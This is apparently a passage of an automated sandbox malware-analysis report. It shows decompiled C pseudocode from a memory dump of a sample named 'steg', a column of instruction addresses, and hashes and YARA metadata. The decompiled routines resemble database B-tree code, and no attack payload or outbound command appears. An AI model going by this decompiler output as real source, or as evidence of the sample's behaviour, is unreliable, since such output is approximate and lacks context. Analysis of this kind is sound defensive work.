				signed int* _v176;
				intOrPtr _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t201;
				signed int _t208;
				signed int _t211;
				char* _t212;
				intOrPtr _t224;
				signed int _t225;
				intOrPtr _t250;
				intOrPtr _t253;
				intOrPtr _t256;
				intOrPtr _t260;
				signed int _t264;
				signed int _t276;
				signed int _t287;
				intOrPtr _t292;
				intOrPtr _t301;
				signed int _t303;
				intOrPtr _t304;
				char* _t307;
				void* _t310;
				intOrPtr _t315;
				intOrPtr _t317;
				intOrPtr _t318;
				void* _t319;
				signed int _t320;
				intOrPtr _t321;
				intOrPtr* _t343;
				intOrPtr* _t348;
				intOrPtr _t356;
				signed int _t362;
				intOrPtr _t363;
				signed int _t369;
				intOrPtr _t370;
				void* _t376;
				intOrPtr _t379;
				signed int _t381;
				intOrPtr* _t391;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				intOrPtr _t397;
				signed int _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t404;
				void* _t405;

				_t376 = __edx;
				_t319 = __ecx;
				_v8 =  *0x481f80 ^ _t400;
				_t317 = _a4;
				_t393 = _a20;
				_t391 =  *((intOrPtr*)(_t317 + 4));
				_v112 = _t317;
				_v176 = _t393;
				E00FB9DF7(_t317);
				_v180 =  *((intOrPtr*)( *((intOrPtr*)( *_t391 + 0xa8)) + 0xc));
				_t201 = E00FAAB27(_t319, _t317);
				_t402 = _t401 + 8;
				if(_t201 == 0) {
					_v168 = _t391;
					_v164 =  *_t391;
					_v172 = 0xffffffff;
					E00FCAF37( *_t391,  &_v172);
					_t320 = _v172;
					_t403 = _t402 + 8;
					_v160 = _t320;
					_v152 = _a16;
					_v148 = 0;
					_v144 = 0;
					 *_t393 = 0;
					if(_t320 != 0) {
						_t321 = E00FC91B7(4 + _t320 * 4);
						_t404 = _t403 + 4;
						_v156 = _t321;
						if(_t321 != 0) {
							_t208 = 0;
							while(1) {
								 *(_t321 + _t208 * 4) = 0;
								_t394 = _v160;
								_t208 = _t208 + 1;
								if(_t208 > _t394) {
									break;
								}
								_t321 = _v156;
							}
							asm("cdq");
							_t211 =  *0x4818d4 / ( *(_t391 + 0x14) & 0x0000ffff) + 1;
							if(_t211 <= _t394) {
								 *(_v156 + _t211 * 4) = 1;
							}
							_v140 = 0;
							_v128 = 0;
							_v124 = 0x64;
							_v120 = 0x4e20;
							_v115 = 1;
							_v116 = 0;
							_t212 =  &_v108;
							_v136 = _t212;
							_v132 = _t212;
							E00FA0FA7( &_v168, 1, ((( *( *((intOrPtr*)( *(_t391 + 0xc) + 0x40)) + 0x20) & 0x000000ff) << 0x00000008 |  *( *((intOrPtr*)( *(_t391 + 0xc) + 0x40)) + 0x21) & 0x000000ff) << 0x00000008 |  *( *((intOrPtr*)( *(_t391 + 0xc) + 0x40)) + 0x22) & 0x000000ff) << 0x00000008 |  *( *((intOrPtr*)( *(_t391 + 0xc) + 0x40)) + 0x23) & 0x000000ff, ((( *( *((intOrPtr*)( *(_t391 + 0xc) + 0x40)) + 0x24) & 0x000000ff) << 0x00000008 |  *(_t378 + 0x25) & 0x000000ff) << 0x00000008 |  *(_t378 + 0x26) & 0x000000ff) << 0x00000008 |  *(_t378 + 0x27) & 0x000000ff, 0x4764f8);
							_t395 = 0;
							_t405 = _t404 + 0x14;
							if(_a12 > 0) {
								_t318 = _a8;
								while(_v152 != 0) {
									_t292 =  *((intOrPtr*)(_t318 + _t395 * 4));
									if(_t292 != 0) {
										if( *((char*)(_t391 + 0x12)) != 0 && _t292 > 1) {
											E00FA1197( &_v168, _t292, 1, 0, 0);
											_t405 = _t405 + 0x14;
										}
										E00FA1297(_t378,  &_v168,  *((intOrPtr*)(_t318 + _t395 * 4)), 0x476508);
										_t405 = _t405 + 0xc;
									}
									_t395 = _t395 + 1;
									if(_t395 < _a12) {
										continue;
									}
									break;
								}
								_t317 = _v112;
							}
							_t396 = 1;
							if(_v160 >= 1) {
								while(_v152 != 0) {
									if( *((intOrPtr*)(_v156 + _t396 * 4)) == 0) {
										_t98 = _t396 - 2; // -1
										_t362 =  *(_t391 + 0x14) & 0x0000ffff;
										_v112 = _t98 / ((0x66666667 * ( *(_t391 + 0x16) & 0x0000ffff) >> 0x20 >> 1 >> 0x1f) + 1 + (0x66666667 * ( *(_t391 + 0x16) & 0x0000ffff) >> 0x20 >> 1)) * ((0x66666667 * ( *(_t391 + 0x16) & 0x0000ffff) >> 0x20 >> 1 >> 0x1f) + 1 + (0x66666667 * ( *(_t391 + 0x16) & 0x0000ffff) >> 0x20 >> 1)) + 2;
										_t287 =  *0x4818d4;
										asm("cdq");
										_t378 = _t287 % _t362;
										_t363 = _v112;
										if(_t363 == _t287 / _t362 + 1) {
											_t363 = _t363 + 1;
										}
										if(_t363 != _t396 ||  *((char*)(_t391 + 0x12)) == 0) {
											E00FA0D77( &_v168, 0, 0x476520, _t396);
											_t405 = _t405 + 0x10;
										}
									}
									if( *((intOrPtr*)(_v156 + _t396 * 4)) != 0) {
										_t120 = _t396 - 2; // -1
										_t369 =  *(_t391 + 0x14) & 0x0000ffff;
										_v112 = _t120 / ((0x66666667 * ( *(_t391 + 0x16) & 0x0000ffff) >> 0x20 >> 1 >> 0x1f) + 1 + (0x66666667 * ( *(_t391 + 0x16) & 0x0000ffff) >> 0x20 >> 1)) * ((0x66666667 * ( *(_t391 + 0x16) & 0x0000ffff) >> 0x20 >> 1 >> 0x1f) + 1 + (0x66666667 * ( *(_t391 + 0x16) & 0x0000ffff) >> 0x20 >> 1)) + 2;
										_t276 =  *0x4818d4;
										asm("cdq");
										_t378 = _t276 % _t369;
										_t370 = _v112;
										if(_t370 == _t276 / _t369 + 1) {
											_t370 = _t370 + 1;
										}
										if(_t370 == _t396 &&  *((char*)(_t391 + 0x12)) != 0) {
											E00FA0D77( &_v168, 0, 0x476538, _t396);
											_t405 = _t405 + 0x10;
										}
									}
									_t396 = _t396 + 1;
									if(_t396 <= _v160) {
										continue;
									}
									goto L57;
								}
							}
							L57:
							if( *((char*)(_t391 + 0x20)) == 0 &&  *((intOrPtr*)(_t391 + 8)) == 0) {
								_t264 =  *(_t391 + 0xc);
								if(_t264 != 0) {
									_t265 =  *((intOrPtr*)(_t264 + 0x44));
									if( *((intOrPtr*)(_t264 + 0x44)) != 0) {
										E00FCBA77(_t265);
										E00FAEEB7( *((intOrPtr*)(_t265 + 0x10)));
										_t405 = _t405 + 8;
									}
									 *(_t391 + 0xc) = 0;
								}
							}
							_t337 = _v180;
							_t224 =  *((intOrPtr*)( *((intOrPtr*)( *_t391 + 0xa8)) + 0xc));
							if(_v180 != _t224) {
								_push(_t224);
								E00FA0D77( &_v168, 0, 0x47655c, _t337);
								_t405 = _t405 + 0x14;
							}
							if( *((char*)(_t317 + 9)) != 0) {
								_t146 = _t317 + 0xc;
								 *_t146 =  *((intOrPtr*)(_t317 + 0xc)) - 1;
								if( *_t146 == 0) {
									_t260 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 4)) + 0x30));
									if(_t260 != 0) {
										 *0x481858(_t260);
										_t405 = _t405 + 4;
									}
									 *((char*)(_t317 + 0xa)) = 0;
								}
							}
							_t397 = _v156;
							if(_t397 != 0) {
								if( *0x481808 == 0) {
									 *0x481824(_v156);
									goto L77;
								} else {
									_t250 =  *0x481910;
									if(_t250 != 0) {
										 *0x481850(_t250);
										_t405 = _t405 + 4;
									}
									_t356 =  *0x487020 +  ~( *0x48182c(_t397));
									_t253 =  *0x487044;
									_t254 =  >  ? _t356 : _t253;
									 *0x487020 = _t356;
									 *0x487044 =  >  ? _t356 : _t253;
									 *0x481824(_t397);
									_t256 =  *0x481910;
									_t405 = _t405 + 8;
									if(_t256 != 0) {
										 *0x481858(_t256);
										L77:
										_t405 = _t405 + 4;
									}
								}
							}
							if(_v144 == 0) {
								_t225 = _v148;
								 *_v176 = _t225;
								if(_t225 != 0) {
									_t379 = _v132;
									if(_t379 != 0) {
										 *((char*)(_v128 + _t379)) = 0;
										_t379 = _v132;
										if(_v115 != 0 && _t379 == _v136) {
											_t379 = E00FBE727(_v140, _v128 + 1);
											_v132 = _t379;
											if(_t379 != 0) {
												E00FE7337(_t379, _v136, _v128 + 1);
												_t379 = _v132;
											}
										}
									}
									return E00FE72F2(_t379, _t317, _v8 ^ _t400, _t379, _t391, _t397);
								} else {
									_t343 = _v132;
									if(_t343 == _v136) {
										L95:
										return E00FE72F2(0, _t317, _v8 ^ _t400, 0, _t391, _t397);
									} else {
										_t381 = _v140;
										if(_t381 == 0 || _t343 == 0 || _t343 <  *((intOrPtr*)(_t381 + 0xe8)) || _t343 >=  *((intOrPtr*)(_t381 + 0xec))) {
											E00F97247(_t343);
											goto L95;
										} else {
											 *_t343 =  *((intOrPtr*)(_t381 + 0xe4));
											 *((intOrPtr*)(_t381 + 0xdc)) =  *((intOrPtr*)(_t381 + 0xdc)) - 1;
											 *((intOrPtr*)(_t381 + 0xe4)) = _t343;
											return E00FE72F2(0, _t317, _v8 ^ _t400, 0, _t391, _t397);
										}
									}
								}
							} else {
								_t348 = _v132;
								if(_t348 == _v136) {
									L86:
									 *_v176 = _v148 + 1;
									return E00FE72F2(0, _t317, _v8 ^ _t400, _t378, _t391, _t397);
								} else {
									_t378 = _v140;
									if(_t378 == 0 || _t348 == 0 || _t348 <  *((intOrPtr*)(_t378 + 0xe8)) || _t348 >=  *((intOrPtr*)(_t378 + 0xec))) {
										E00F97247(_t348);
										goto L86;
									} else {
										 *_t348 =  *((intOrPtr*)(_t378 + 0xe4));
										 *((intOrPtr*)(_t378 + 0xdc)) =  *((intOrPtr*)(_t378 + 0xdc)) - 1;
										 *((intOrPtr*)(_t378 + 0xe4)) = _t348;
										 *_v176 = _v148 + 1;
										return E00FE72F2(0, _t317, _v8 ^ _t400, _t378, _t391, _t397);
									}
								}
							}
						} else {
							E00FE29F7(_t391);
							_t403 = _t404 + 4;
							 *_t393 = 1;
							goto L18;
						}
					} else {
						if( *((intOrPtr*)(_t391 + 0x20)) == _t320 &&  *((intOrPtr*)(_t391 + 8)) == _t320) {
							_t303 =  *(_t391 + 0xc);
							if(_t303 != 0) {
								_t304 =  *((intOrPtr*)(_t303 + 0x44));
								if(_t304 != 0) {
									_t393 =  *(_t304 + 0x10);
									E00FCBA77(_t304);
									E00FAEEB7( *(_t304 + 0x10));
									_t403 = _t403 + 8;
								}
								 *(_t391 + 0xc) = 0;
							}
						}
						L18:
						if( *((char*)(_t317 + 9)) != 0) {
							_t35 = _t317 + 0xc;
							 *_t35 =  *((intOrPtr*)(_t317 + 0xc)) - 1;
							if( *_t35 == 0) {
								_t301 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 4)) + 0x30));
								if(_t301 != 0) {
									 *0x481858(_t301);
								}
								 *((char*)(_t317 + 0xa)) = 0;
							}
						}
						return E00FE72F2(0, _t317, _v8 ^ _t400, _t376, _t391, _t393);
					}
				} else {
					 *_t393 = 1;
					if( *((char*)(_t317 + 9)) != 0) {
						_t11 = _t317 + 0xc;
						 *_t11 =  *((intOrPtr*)(_t317 + 0xc)) - 1;
						if( *_t11 == 0) {
							_t315 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 4)) + 0x30));
							if(_t315 != 0) {
								 *0x481858(_t315);
								_t402 = _t402 + 4;
							}
							 *((char*)(_t317 + 0xa)) = 0;
						}
					}
					_t307 = 0x4764cc;
					goto L7;
					L7:
					_t307 = _t307 + 1;
					if( *_t307 != 0) {
						goto L7;
					} else {
						_t16 = (_t307 - 0x004764cc & 0x3fffffff) + 1; // 0x2
						_t392 = _t16;
						_t310 = E00FC91B7(_t16);
						_t399 = _t310;
						if(_t310 != 0) {
							E00FE7337(_t399, 0x4764cc, _t392);
						}
						return E00FE72F2(_t399, _t317, _v8 ^ _t400, _t376, _t392, _t399);
					}
				}
			}









































































                                                                                                                    0x00fba6e7
                                                                                                                    0x00fba6e7
                                                                                                                    0x00fba6f7
                                                                                                                    0x00fba6fb
                                                                                                                    0x00fba6ff
                                                                                                                    0x00fba703
                                                                                                                    0x00fba707
                                                                                                                    0x00fba70a
                                                                                                                    0x00fba710
                                                                                                                    0x00fba721
                                                                                                                    0x00fba727
                                                                                                                    0x00fba72c
                                                                                                                    0x00fba731
                                                                                                                    0x00fba7ab
                                                                                                                    0x00fba7b3
                                                                                                                    0x00fba7c2
                                                                                                                    0x00fba7cc
                                                                                                                    0x00fba7d1
                                                                                                                    0x00fba7da
                                                                                                                    0x00fba7dd
                                                                                                                    0x00fba7e3
                                                                                                                    0x00fba7e9
                                                                                                                    0x00fba7f3
                                                                                                                    0x00fba7fd
                                                                                                                    0x00fba805
                                                                                                                    0x00fba87b
                                                                                                                    0x00fba87d
                                                                                                                    0x00fba880
                                                                                                                    0x00fba888
                                                                                                                    0x00fba89b
                                                                                                                    0x00fba8a7
                                                                                                                    0x00fba8a7
                                                                                                                    0x00fba8ae
                                                                                                                    0x00fba8b4
                                                                                                                    0x00fba8b7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fba8b9
                                                                                                                    0x00fba8b9
                                                                                                                    0x00fba8ca
                                                                                                                    0x00fba8cd
                                                                                                                    0x00fba8d0
                                                                                                                    0x00fba8d8
                                                                                                                    0x00fba8d8
                                                                                                                    0x00fba8df
                                                                                                                    0x00fba8e9
                                                                                                                    0x00fba8f0
                                                                                                                    0x00fba8f7
                                                                                                                    0x00fba8fe
                                                                                                                    0x00fba904
                                                                                                                    0x00fba908
                                                                                                                    0x00fba90b
                                                                                                                    0x00fba911
                                                                                                                    0x00fba968
                                                                                                                    0x00fba96d
                                                                                                                    0x00fba96f
                                                                                                                    0x00fba975
                                                                                                                    0x00fba977
                                                                                                                    0x00fba97a
                                                                                                                    0x00fba983
                                                                                                                    0x00fba988
                                                                                                                    0x00fba98e
                                                                                                                    0x00fba9a3
                                                                                                                    0x00fba9a8
                                                                                                                    0x00fba9a8
                                                                                                                    0x00fba9ba
                                                                                                                    0x00fba9bf
                                                                                                                    0x00fba9bf
                                                                                                                    0x00fba9c2
                                                                                                                    0x00fba9c6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fba9c6
                                                                                                                    0x00fba9c8
                                                                                                                    0x00fba9c8
                                                                                                                    0x00fba9cb
                                                                                                                    0x00fba9d6
                                                                                                                    0x00fba9e7
                                                                                                                    0x00fba9fe
                                                                                                                    0x00fbaa17
                                                                                                                    0x00fbaa1f
                                                                                                                    0x00fbaa26
                                                                                                                    0x00fbaa29
                                                                                                                    0x00fbaa2e
                                                                                                                    0x00fbaa2f
                                                                                                                    0x00fbaa31
                                                                                                                    0x00fbaa37
                                                                                                                    0x00fbaa39
                                                                                                                    0x00fbaa39
                                                                                                                    0x00fbaa3c
                                                                                                                    0x00fbaa53
                                                                                                                    0x00fbaa58
                                                                                                                    0x00fbaa58
                                                                                                                    0x00fbaa3c
                                                                                                                    0x00fbaa65
                                                                                                                    0x00fbaa7e
                                                                                                                    0x00fbaa86
                                                                                                                    0x00fbaa8d
                                                                                                                    0x00fbaa90
                                                                                                                    0x00fbaa95
                                                                                                                    0x00fbaa96
                                                                                                                    0x00fbaa98
                                                                                                                    0x00fbaa9e
                                                                                                                    0x00fbaaa0
                                                                                                                    0x00fbaaa0
                                                                                                                    0x00fbaaa3
                                                                                                                    0x00fbaaba
                                                                                                                    0x00fbaabf
                                                                                                                    0x00fbaabf
                                                                                                                    0x00fbaaa3
                                                                                                                    0x00fbaac2
                                                                                                                    0x00fbaac9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbaac9
                                                                                                                    0x00fba9e7
                                                                                                                    0x00fbaacf
                                                                                                                    0x00fbaad3
                                                                                                                    0x00fbaadb
                                                                                                                    0x00fbaae0
                                                                                                                    0x00fbaae2
                                                                                                                    0x00fbaae7
                                                                                                                    0x00fbaaed
                                                                                                                    0x00fbaaf3
                                                                                                                    0x00fbaaf8
                                                                                                                    0x00fbaaf8
                                                                                                                    0x00fbaafb
                                                                                                                    0x00fbaafb
                                                                                                                    0x00fbaae0
                                                                                                                    0x00fbab04
                                                                                                                    0x00fbab10
                                                                                                                    0x00fbab15
                                                                                                                    0x00fbab17
                                                                                                                    0x00fbab27
                                                                                                                    0x00fbab2c
                                                                                                                    0x00fbab2c
                                                                                                                    0x00fbab33
                                                                                                                    0x00fbab35
                                                                                                                    0x00fbab35
                                                                                                                    0x00fbab38
                                                                                                                    0x00fbab3d
                                                                                                                    0x00fbab42
                                                                                                                    0x00fbab45
                                                                                                                    0x00fbab4b
                                                                                                                    0x00fbab4b
                                                                                                                    0x00fbab4e
                                                                                                                    0x00fbab4e
                                                                                                                    0x00fbab38
                                                                                                                    0x00fbab52
                                                                                                                    0x00fbab5a
                                                                                                                    0x00fbab63
                                                                                                                    0x00fbabc0
                                                                                                                    0x00000000
                                                                                                                    0x00fbab65
                                                                                                                    0x00fbab65
                                                                                                                    0x00fbab6c
                                                                                                                    0x00fbab6f
                                                                                                                    0x00fbab75
                                                                                                                    0x00fbab75
                                                                                                                    0x00fbab87
                                                                                                                    0x00fbab89
                                                                                                                    0x00fbab90
                                                                                                                    0x00fbab94
                                                                                                                    0x00fbab9a
                                                                                                                    0x00fbab9f
                                                                                                                    0x00fbaba5
                                                                                                                    0x00fbabaa
                                                                                                                    0x00fbabaf
                                                                                                                    0x00fbabb2
                                                                                                                    0x00fbabc6
                                                                                                                    0x00fbabc6
                                                                                                                    0x00fbabc6
                                                                                                                    0x00fbabaf
                                                                                                                    0x00fbab63
                                                                                                                    0x00fbabd0
                                                                                                                    0x00fbac60
                                                                                                                    0x00fbac6c
                                                                                                                    0x00fbac70
                                                                                                                    0x00fbace2
                                                                                                                    0x00fbace7
                                                                                                                    0x00fbacec
                                                                                                                    0x00fbacf4
                                                                                                                    0x00fbacf7
                                                                                                                    0x00fbad11
                                                                                                                    0x00fbad16
                                                                                                                    0x00fbad1b
                                                                                                                    0x00fbad29
                                                                                                                    0x00fbad2e
                                                                                                                    0x00fbad31
                                                                                                                    0x00fbad1b
                                                                                                                    0x00fbacf7
                                                                                                                    0x00fbad46
                                                                                                                    0x00fbac72
                                                                                                                    0x00fbac72
                                                                                                                    0x00fbac7b
                                                                                                                    0x00fbacce
                                                                                                                    0x00fbace1
                                                                                                                    0x00fbac7d
                                                                                                                    0x00fbac7d
                                                                                                                    0x00fbac85
                                                                                                                    0x00fbacc5
                                                                                                                    0x00000000
                                                                                                                    0x00fbac9b
                                                                                                                    0x00fbaca1
                                                                                                                    0x00fbaca3
                                                                                                                    0x00fbacaa
                                                                                                                    0x00fbacc3
                                                                                                                    0x00fbacc3
                                                                                                                    0x00fbac85
                                                                                                                    0x00fbac7b
                                                                                                                    0x00fbabd6
                                                                                                                    0x00fbabd6
                                                                                                                    0x00fbabdf
                                                                                                                    0x00fbac3e
                                                                                                                    0x00fbac4d
                                                                                                                    0x00fbac5f
                                                                                                                    0x00fbabe1
                                                                                                                    0x00fbabe1
                                                                                                                    0x00fbabe9
                                                                                                                    0x00fbac36
                                                                                                                    0x00000000
                                                                                                                    0x00fbabff
                                                                                                                    0x00fbac05
                                                                                                                    0x00fbac07
                                                                                                                    0x00fbac0d
                                                                                                                    0x00fbac22
                                                                                                                    0x00fbac34
                                                                                                                    0x00fbac34
                                                                                                                    0x00fbabe9
                                                                                                                    0x00fbabdf
                                                                                                                    0x00fba88a
                                                                                                                    0x00fba88b
                                                                                                                    0x00fba890
                                                                                                                    0x00fba893
                                                                                                                    0x00000000
                                                                                                                    0x00fba893
                                                                                                                    0x00fba807
                                                                                                                    0x00fba80a
                                                                                                                    0x00fba811
                                                                                                                    0x00fba816
                                                                                                                    0x00fba818
                                                                                                                    0x00fba81d
                                                                                                                    0x00fba81f
                                                                                                                    0x00fba823
                                                                                                                    0x00fba829
                                                                                                                    0x00fba82e
                                                                                                                    0x00fba82e
                                                                                                                    0x00fba831
                                                                                                                    0x00fba831
                                                                                                                    0x00fba816
                                                                                                                    0x00fba838
                                                                                                                    0x00fba83c
                                                                                                                    0x00fba83e
                                                                                                                    0x00fba83e
                                                                                                                    0x00fba841
                                                                                                                    0x00fba846
                                                                                                                    0x00fba84b
                                                                                                                    0x00fba84e
                                                                                                                    0x00fba854
                                                                                                                    0x00fba857
                                                                                                                    0x00fba857
                                                                                                                    0x00fba841
                                                                                                                    0x00fba86d
                                                                                                                    0x00fba86d
                                                                                                                    0x00fba733
                                                                                                                    0x00fba733
                                                                                                                    0x00fba73d
                                                                                                                    0x00fba73f
                                                                                                                    0x00fba73f
                                                                                                                    0x00fba742
                                                                                                                    0x00fba747
                                                                                                                    0x00fba74c
                                                                                                                    0x00fba74f
                                                                                                                    0x00fba755
                                                                                                                    0x00fba755
                                                                                                                    0x00fba758
                                                                                                                    0x00fba758
                                                                                                                    0x00fba742
                                                                                                                    0x00fba75c
                                                                                                                    0x00fba75c
                                                                                                                    0x00fba767
                                                                                                                    0x00fba767
                                                                                                                    0x00fba76b
                                                                                                                    0x00000000
                                                                                                                    0x00fba76d
                                                                                                                    0x00fba777
                                                                                                                    0x00fba777
                                                                                                                    0x00fba77b
                                                                                                                    0x00fba780
                                                                                                                    0x00fba787
                                                                                                                    0x00fba790
                                                                                                                    0x00fba795
                                                                                                                    0x00fba7aa
                                                                                                                    0x00fba7aa
                                                                                                                    0x00fba76b

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: N$d$gfff$gfff
                                                                                                                    • API String ID: 4104443479-3085505530
                                                                                                                    • Opcode ID: f463eb57d271309838a92a8b472de20d73216a9a1c637825091807e29e637a33
                                                                                                                    • Instruction ID: 841bec3ab27b05da099b13c441458c6fd2ba0940414ef8bfecceda9a5535e538
                                                                                                                    • Opcode Fuzzy Hash: f463eb57d271309838a92a8b472de20d73216a9a1c637825091807e29e637a33
                                                                                                                    • Instruction Fuzzy Hash: 2912D270E002549FDB28DF2ACC81BADB7B5FF45310F0880AAE8499B642E735D985DF52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F9E337 Relevance: 8.8, APIs: 5, Instructions: 1346COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00F9E337(void* __edx, void* __edi, signed int _a4, signed int _a8, signed char* _a12, signed int _a16) {
				signed int _v8;
				signed int _v28;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed char* _v136;
				char _v148;
				signed char _v168;
				signed short _v172;
				intOrPtr _v188;
				intOrPtr _v192;
				char _v200;
				void* __ebx;
				void* __esi;
				signed int _t756;
				void* _t759;
				signed int _t765;
				signed int _t772;
				signed int _t773;
				intOrPtr _t774;
				signed int _t775;
				signed int* _t778;
				signed int _t780;
				signed int _t781;
				signed int _t785;
				signed int _t787;
				intOrPtr _t791;
				intOrPtr _t793;
				intOrPtr _t794;
				signed int* _t795;
				signed int _t796;
				intOrPtr _t797;
				signed int _t799;
				signed int* _t802;
				signed int _t804;
				signed int _t805;
				signed int _t809;
				signed int _t811;
				signed int _t817;
				signed int _t821;
				signed int _t822;
				signed int _t830;
				signed int _t832;
				intOrPtr _t833;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t849;
				signed int _t850;
				signed int _t853;
				signed char _t855;
				signed short _t860;
				signed int _t873;
				signed int _t875;
				signed int _t878;
				signed short _t915;
				void* _t921;
				signed int _t923;
				intOrPtr _t925;
				signed int _t928;
				intOrPtr _t929;
				signed int _t931;
				signed int _t933;
				intOrPtr _t937;
				intOrPtr _t938;
				signed int* _t939;
				signed int _t940;
				intOrPtr _t941;
				void* _t948;
				signed int _t949;
				signed int* _t951;
				signed int _t957;
				signed int _t959;
				void* _t966;
				signed int _t972;
				short _t986;
				signed short _t997;
				signed int _t1014;
				signed int _t1015;
				signed int _t1018;
				signed int _t1019;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1023;
				char* _t1025;
				signed int _t1028;
				signed int _t1029;
				signed int _t1030;
				signed int _t1031;
				signed int _t1032;
				intOrPtr* _t1033;
				intOrPtr _t1034;
				void* _t1037;
				signed char* _t1038;
				signed int _t1039;
				signed int _t1041;
				signed int _t1048;
				signed int _t1051;
				intOrPtr _t1053;
				intOrPtr _t1054;
				signed int* _t1055;
				signed int _t1056;
				intOrPtr _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				intOrPtr _t1065;
				intOrPtr _t1067;
				signed int _t1068;
				signed char _t1070;
				signed int _t1072;
				signed int _t1077;
				signed int _t1083;
				signed int _t1084;
				signed int _t1086;
				signed int _t1095;
				signed int _t1100;
				signed int _t1101;
				signed int _t1103;
				signed int _t1106;
				signed int _t1115;
				signed char* _t1116;
				signed char* _t1121;
				signed int _t1126;
				signed int _t1127;
				intOrPtr* _t1132;
				intOrPtr* _t1133;
				signed int _t1135;
				signed int _t1142;
				intOrPtr _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1162;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed char _t1167;
				signed int _t1175;
				void* _t1187;
				signed int _t1188;
				signed int _t1189;
				signed int _t1190;
				signed int _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1202;
				signed int _t1212;
				intOrPtr* _t1214;
				signed int _t1215;
				intOrPtr _t1216;
				signed int _t1218;
				void* _t1220;
				signed int _t1221;
				signed int _t1226;
				signed int _t1228;
				signed int _t1229;
				intOrPtr _t1230;
				signed int _t1231;
				signed int _t1233;
				void* _t1234;
				void* _t1235;
				void* _t1236;
				void* _t1237;
				void* _t1239;

				_v8 =  *0x481f80 ^ _t1233;
				_t1038 = _a12;
				_t1200 = _a4;
				_t1013 = 0;
				_v68 = _t1200;
				_v136 = _t1038;
				_v76 = 0;
				_v88 = 0;
				_v60 = 0;
				_v112 = 0;
				_v96 = 0;
				_v84 =  *((intOrPtr*)(_t1200 + 0x3c));
				if(_t1038 != 0) {
					_t1039 =  *(_t1200 + 0x10) & 0x0000ffff;
					_t1126 =  *(_t1200 + 1) & 0x000000ff;
					_push(__edi);
					_t1186 = _t1126 + _t1039;
					__eflags = _t1186 - 2;
					if(_t1186 >= 2) {
						_t756 = _a8;
						_v72 = 3;
						__eflags = _t756;
						if(_t756 != 0) {
							__eflags = _t756 - _t1186;
							if(_t756 != _t1186) {
								_t756 = _t756 - 1;
								__eflags = _t756;
							} else {
								_t756 = _t1186 - 2;
							}
						}
						_t1186 = 2;
					} else {
						_v72 = _t1186 + 1;
						_t1200 = _v68;
						_t756 = 0;
					}
					_v56 = _t756;
					_t1127 = _t756 - _t1126 + _t1186;
					__eflags = _t1127 - _t1039;
					if(_t1127 != _t1039) {
						_t759 = ( *(_t1200 + 0xc) & 0x0000ffff) +  *((intOrPtr*)(_t1200 + 0x40));
						_t1041 = ( *(_t759 + _t1127 * 2) & 0x000000ff) << 8;
						_t1131 = ((_t1041 |  *(_t759 + 1 + _t1127 * 2) & 0x000000ff) &  *(_t1200 + 0x12) & 0x0000ffff) +  *((intOrPtr*)(_t1200 + 0x40));
						__eflags = _t1131;
						_v128 = _t1041;
					} else {
						_t1131 =  *((intOrPtr*)(_t1200 + 0x40)) + 8 + ( *(_t1200 + 5) & 0x000000ff);
					}
					_t1048 = ((( *_t1131 & 0x000000ff) << 0x00000008 |  *(_t1131 + 1) & 0x000000ff) << 0x00000008 |  *(_t1131 + 2) & 0x000000ff) << 0x00000008 |  *(_t1131 + 3) & 0x000000ff;
					_t1202 =  &_v148 + _t1186 * 4;
					_v128 = _t1131;
					_v124 = _t1048;
					_v132 = _t1048;
					_t765 = E00FA8CB7(_t1131, _v84, _t1048, _t1202);
					_t1235 = _t1234 + 0xc;
					_v52 = _t765;
					__eflags = _t765;
					if(_t765 != 0) {
						L19:
						E00FE7C87( &_v148, 0, _t1186 * 4);
						goto L20;
					} else {
						while(1) {
							_t817 = _t1186;
							_t1013 = _t1013 + ( *( *_t1202 + 1) & 0x000000ff) + 1 + ( *( *_t1202 + 0x10) & 0x0000ffff);
							_t1186 = _t1186 - 1;
							__eflags = _t817;
							if(_t817 == 0) {
								break;
							}
							_t1229 = _v68;
							_t1167 =  *((intOrPtr*)(_t1229 + 1));
							__eflags = _t1167;
							if(_t1167 == 0) {
								L17:
								_t1230 =  *((intOrPtr*)(_t1229 + 0x40));
								_t1115 = (( *(( *(_v68 + 0xc) & 0x0000ffff) + _t1230 + (_v56 - (_t1167 & 0x000000ff) + _t1186) * 2) & 0x000000ff) << 0x00000008 |  *(( *(_v68 + 0xc) & 0x0000ffff) + _t1230 + 1 + (_v56 - (_t1167 & 0x000000ff) + _t1186) * 2) & 0x000000ff) &  *(_v68 + 0x12) & 0x0000ffff;
								_t1116 = _t1115 + _t1230;
